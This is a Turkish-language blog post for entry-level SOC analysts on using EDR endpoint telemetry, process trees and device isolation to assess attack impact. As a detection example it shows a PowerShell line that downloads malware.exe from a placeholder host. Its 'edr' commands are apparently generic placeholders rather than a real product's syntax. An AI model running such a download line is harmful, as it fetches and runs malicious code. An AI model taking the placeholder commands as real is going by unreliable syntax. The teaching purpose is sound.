CyberFlow Logo CyberFlow BLOG
Soc L1 Etki Analizi

Uç Nokta Telemetrisi ile Siber Tehditleri Anlamak

✍️ Ahmet BİRKAN 📂 Soc L1 Etki Analizi

Uç nokta telemetrisi, siber güvenlikte elde edilen verilerle tehditleri hızlıca analiz etmenizi sağlar.

Uç Nokta Telemetrisi ile Siber Tehditleri Anlamak

Uç nokta telemetrisi, siber tehditlerin etkilerini anlamak ve hızlıca çevresel analiz yapmak için kritik önem taşır. Bu yazıda, EDR sistemlerinin sunduğu verilerle etki analizinin nasıl yapıldığını keşfedeceksiniz.

Giriş ve Konumlandırma

Uç Nokta Telemetrisi ile Siber Tehditleri Anlamak

Siber güvenlik dünyası, sürekli olarak yeni tehditlerin ortaya çıktığı ve mevcut saldırı yöntemlerinin evrildiği dinamik bir alan olmaya devam ediyor. Bu bağlamda, uç nokta telemetrisi, sorunları daha önce fark edip müdahale etmek için kritik bir araç olarak öne çıkıyor. Uç nokta dedektörü ve yanıtı (EDR), iş yerlerindeki bilgisayarlar, sunucular ve diğer cihazlardaki tüm süreç hareketlerini, dosya değişikliklerini ve ağ bağlantılarını anlık olarak kaydeden sistemlerdir. EDR sistemleri, sadece tehditleri tespit etmekle kalmaz, aynı zamanda bu tehditlerin cihaz üzerindeki etkilerini analiz etmemizi sağlar.

Siber Tehditler ve Saldırılar

Günümüz siber tehditleri genellikle karmaşık ve çok katmanlıdır. Bir tehdidin cihaza nasıl yayıldığını, hangi süreçlerin ve dosyaların etkilendiğini anlamak, güvenlik uzmanları için hayati önem taşır. Örnek vermek gerekirse, bir zararlı yazılımın sisteme sızdığı anı tespit etmek, bu zararlının bıraktığı "izleri" takip ederek mümkün olur. EDR, bu süreci yalnızca bir "virüs bulundu" uyarısı ile değil, aynı zamanda zararlının ağda ne kadar yayıldığını ve hangi dosyaları değiştirdiğini detaylı şekilde göstererek destekler.

Bir EDR çözümünün temel fonksiyonlarından biri, cihazlar üzerindeki süreçlerin ebeveyn ve çocuk ilişkilerini analiz etmektir. Örneğin, bir PDF okuyucunun komut satırını açması beklenmedik bir durumdur. EDR, bu tür şüpheli ebeveyn-çocuk ilişkilerini tespit ederek, analistlerin tehditin kökenine inmesine yardımcı olur.

Telemetri ve Veri Analizi

Uç noktalardan toplanan sürekli veri akışı, siber güvenlik alanında "telemetri" olarak adlandırılır. Telemetri verileri, yalnızca veri toplamakla kalmamakta, aynı zamanda bu verilerin analiz edilmesi ve yorumlanması için de büyük bir önem taşımaktadır. 

{
  "telemetri_analizi": {
    "proses": "Scanned Process",
    "dosya_degisikligi": "Modified Files",
    "ağ_bağlantısı": "Network Connections"
  }
}

Yukarıdaki örnekte, telemetri verilerinin analizinin ne tür bilgilere ulaşmamıza olanak tanıdığını görebiliriz. EDR sistemleri, bu verileri sürekli olarak analiz ederek, anormal veya şüpheli davranışların tespit edilmesini sağlar.

Bahsedilen Analiz Süreçleri

Siber güvenlik uzmanları, EDR sistemlerini kullanarak şüpheli aktiviteleri denetleme ve izleme yaparlar. Örnek olarak, analiz edilen bir cihazın etkilediği alanların genişlemesi, uzmanın bu cihazı izolasyona alma kararını vermesini sağlayabilir. Bu işlem, cihazın ağ bağlantılarının kesilmesi yoluyla gerçekleştirilir. Analistler, EDR verilerini utilize ederek, siber güvenlik stratejilerini geliştirebilir ve anlık müdahale yeteneklerini artırabilir.

Sonuç

Uç nokta telemetrisi, siber güvenlikte etkili tehdit tespit ve yanıt süreçlerinin temel taşlarından biridir. EDR sistemleri, güvenlik analistlerine gerekli bilgileri sunarak hızlı ve etkili müdahalelere olanak tanır. Bu süreçlerin anlaşılıp uygulanması, bir organizasyonun siber güvenliğini sağlamada kritik öneme sahiptir. Siber tehditleri anlamak ve bunlara karşı önlem almak için, uç nokta telemetrisi üzerine yapılan analizler detaylandırılmalı ve sıklıkla gözden geçirilmelidir. Gelecek bölümlerde, uç nokta telemetrisinin işleyişine dair daha fazla teknik detaya ve pratik örneğe yer vereceğiz.

Teknik Analiz ve Uygulama

Gözlem Altındaki Cihazlar

Uç nokta güvenliği sağlamak, her bir cihazda yürütülen işlemlerin sürekli olarak izlenmesini gerektirir. Uç nokta tespiti ve yanıt (EDR) çözümleri, bilgisayarlar, sunucular ve diğer cihazlar üzerinde gerçekleştirilen tüm işlemleri kaydeder. Bu, dosya değişiklikleri, ağ bağlantıları ve sistemdeki diğer aktiviteleri kapsamaktadır. Bu bilgiler, potansiyel tehditlerin tespit edilmesi ve analizi açısından kritik öneme sahiptir. EDR sistemleri, bu tür verileri sürekli olarak yakalayarak güvenlik analistlerine siber saldırganların hareketlerini takip edebilme olanağı sunar.

Verinin Derinliği

Uç noktalardan toplanan verilerin derinliği, analizlerin doğruluğunu ve etkisini artırır. EDR telemetrisi sayesinde, zararlı yazılımların hangi dosyaları değiştirdiğini ve hangi süreçleri başlattığını detaylıca görebiliriz. Örneğin, bir yazılımın (örneğin Acrobat) hangi komut dosyalarını çalıştırdığı gibi bilgiler, saldırının nasıl başladığını anlamamıza yardımcı olur. Bu tür bilgiler, analistlerin tehditlerin kökenini ve yayıldığı yolları belirlemek için analiz yapmalarını sağlar. 

edr collect --device <cihaz_ismi> --events

Yukarıdaki komut, belirli bir cihazdan EDR telemetri verilerini toplamak için kullanılabilir. Bu sayede, analistler cihaz üzerindeki tüm aktiviteleri izleyebilir.

Analiz Verileri

EDR sistemleri, elde edilen verileri işlerken çok sayıda analiz türü sunar. Bu analizlerin başında proses ağaçları (Process Trees) gelmektedir. Proses ağacı, bir yazılımın hangi diğer yazılımları çalıştırdığını gösteren ebeveyn-çocuk ilişkisini temsil eder. Bir EDR çözümünde, şüpheli bir sürecin ebeveyn sürecini bulmak, saldırının cihazda nasıl başladığını anlamak açısından kritik bir adımdır.

Örnek

Bir zararlı yazılımın indirme sürecine dair örneği ele alalım:

PowerShell.exe -Command "Invoke-WebRequest -Uri http://example.com/malware.exe -OutFile C:\malware.exe"

Bu komut, saldırganın dışarıdan zararlı yazılım indirme girişimini temsil eder. EDR çözümleri bu tür faaliyetleri izleyebilir ve güvenlik analistlerine potansiyel tehlikeleri bildirebilir.

Sürekli Veri Akışı

EDR sistemleri, gerçek zamanlı veri akışı sağlayarak tehditlerin anında tespit edilmesine olanak tanır. Siber güvenlikte sürekli veri akışı, teknik veri grubuna "telemetri" adı verilir. Telemetri verileri, analistlerin tehditleri daha hızlı bir şekilde tanımlamasına olanak tanır.

Veri Akışı Komutu

edr telemetry --stream --device <cihaz_ismi>

Bu komut, belirli bir cihazdan sürekli telemetri verisi akışı sağlamaktadır. Analistler, sürekli veri akışı sayesinde potansiyel tehditleri anında tespit etme becerisine sahip olurlar.

Ebeveyn Takibi

Şüpheli bir işlemin hangi süreçler tarafından başlatıldığını belirlemek, analiz sürecinde kritik bir adımdır. Ebeveyn takibi, analistlerin tehditleri daha iyi bir şekilde anlayabilmelerini sağlar. Örneğin, bir kommando satırı (CMD) işleminin başlatılması, normal bir davranış değildir. EDR bu ebeveyn ilişkisini net bir şekilde gösterir.

Örnek Analiz

ebeyp: Acrobat.exe
çocuk: cmd.exe

Bu tür bir analiz, zararlının sistemde nasıl bir etki yarattığını daha iyi anlamamızı sağlar.

Yayılımı Kesmek

Saldırganların dağılımının engellenmesi açısından EDR'nin bir başka kritik özelliği, tehdit altındaki bir cihazın tüm ağ bağlantılarının kesilmesidir. Bir analist, EDR üzerinden bir cihazın etki alanının genişlediğini fark ettiğinde, saldırıyı durdurmak için o cihazı ağdan izole ederek iletişimi kesebilir.

İzolasyon Komutu

edr isolate --device <cihaz_ismi>

Bu komut, bir cihazın ağ bağlantılarını keser ve saldırının yayılmasını önler.

Sonuç

Uç nokta telemetrisi, siber güvenlik analistlerinin tehdit analizi sürecinde kullandığı önemli bir araçtır. EDR çözümleri, sürekli veri akışı, analiz derinliği ve ebeveyn takibi gibi özellikler sayesinde, zararlı yazılımları ve diğer tehditleri hızlı ve etkili bir şekilde tespit etmeye yardımcı olur. Analistlerin, bu tür sistemleri kullanarak siber tehditleri anlamaları ve yanıt vermeleri, örgütlerin güvenlik duruşunu güçlendirmektedir.

Risk, Yorumlama ve Savunma

Siber güvenlikte, uç noktalar kritik bir öneme sahiptir. Uç noktalar üzerindeki aktivitenin izlenmesi ve analiz edilmesi, herhangi bir saldırının veya tehditin zamanında tespit edilmesi için hayati bir rol oynar. Uç nokta telemetrisi, bu bağlamda, süreçlerin, dosya değişikliklerinin ve ağ bağlantılarının detaylı bir kaydını tutarak, sistem güvenliği açısından bir dizi riskin değerlendirilmesine olanak tanır.

Elde Edilen Bulguların Yorumlanması

Uç nokta telemetrisi, her cihazın güvenlik durumu hakkında detaylı bilgiler sunar. Bu bilgiler, bir saldırının izlerini anlamak ve riskleri değerlendirmenin temelini oluşturur. Örneğin, bir uygulama normalde çalışmadığı bir işlem başlatıyorsa, bu durum potansiyel bir tehditin belirtisi olabilir. 

Örnek: 
Bir PDF okuyucunun (Acrobat) komut satırını açması

Bu gibi durumlar, analistin uyanık olması gereken "şüpheli proses" örnekleridir ve dikkatli bir analiz gerektirir. EDR (Endpoint Detection and Response) sistemleri aracılığıyla elde edilen telemetri verileri, bir zararlının hangi dosyaları değiştirdiğini ve hangi prosesleri başlattığını detaylıca incelemeye imkan tanır.

Yanlış Yapılandırma ve Zafiyetlerin Etkisi

Yanlış yapılandırmaları tespit etmek, siber güvenliği sağlamak için kritik bir adımdır. Yapılandırma hataları, sistemde açıklar oluşturup kötü niyetli aktivitelerin önünü açabilir. Örneğin, güvenlik duvarı kurallarının yanlışluğu, zararlı yazılımların iç ağa sızmasını kolaylaştırabilir.

Sızan Veri, Topoloji ve Servis Tespiti

Bir saldırının başarılı olması durumunda, hangi verilerin sızdığı, hangi sistemlerin etkilendiği ve ağa bağlı diğer cihazların rolü kritik öneme sahiptir. EDR, sistem üzerinde hangi dosya değişikliklerinin yapıldığını ve tüm bu aktivitelerin hangi sistem kaynaklarından kaynaklandığını çok sayıda veri tarafından sağlanabilir. Bu tür bilgiler, saldırının yayılmasını anlamak ve durdurmak için gereklidir.

Örnek Elde Edilen Veriler:
- Kayıt defteri olayları: Zararlının kalıcı olması için yaptığı ayar değişiklikleri.
- Bellek okuma girişimleri: Kimlik hırsızlığına yönelik eylemler.

Profesyonel Önlemler ve Hardening Önerileri

Siber tehditlerle etkin bir şekilde başa çıkmanın yollarından biri, sürekli olarak sistemin "hardening" (güçlendirme) işlemlerini gerçekleştirmektir. Bu işlemler, gereksiz hizmetlerin devre dışı bırakılması, düzgün yamanmamış yazılımların güncellenmesi ve erişim kontrollerinin sıkı bir şekilde yapılmasını içerir. Uç nokta güvenliği için aşağıdaki önlemler alınabilir:

  1. Proses İzolasyonu: Şüpheli bir süreç tespit edildiğinde, bu sürecin bağlı olduğu cihazın ağa erişimi hemen kesilmelidir.

    EDR Komutu: isole cihaz_ismi

  2. Dosya Bütünlüğü Kontrolü: Sistem üzerinde yapılan şüpheli dosya değişikliklerini tespit etmek için düzenli taramalar yapılmalıdır.

  3. Kayıt Defteri İzleme: Zararlı yazılımların sistemde kalıcı hale gelme girişimlerini önlemek için kayıt defteri değişiklikleri izlenmelidir.

  4. Güvenlik Duvarı ve İzin Yönetimi: Ağ düzeyindeki güvenlik önlemlerini sıkılaştırmak, dışarıdan gelebilecek tehditleri önlemek açısından önemlidir.

Sonuç Özeti

Uç nokta telemetrisi, siber güvenlik uygulamalarında vazgeçilmez bir rol oynamaktadır. Elde edilen bulgular, saldırıların ve potansiyel tehditlerin yorumlanmasında kritik bilgiler sunar. Yanlış yapılandırmalar ile zafiyetlerin etkilerini anlamak, güvenlik stratejilerinin gözden geçirilmesini gerektirir. Uygun savunma mekanizmalarının ve hardening uygulamalarının eksiksiz biçimde devreye alınması, siber tehditlere karşı koymanın temelidir.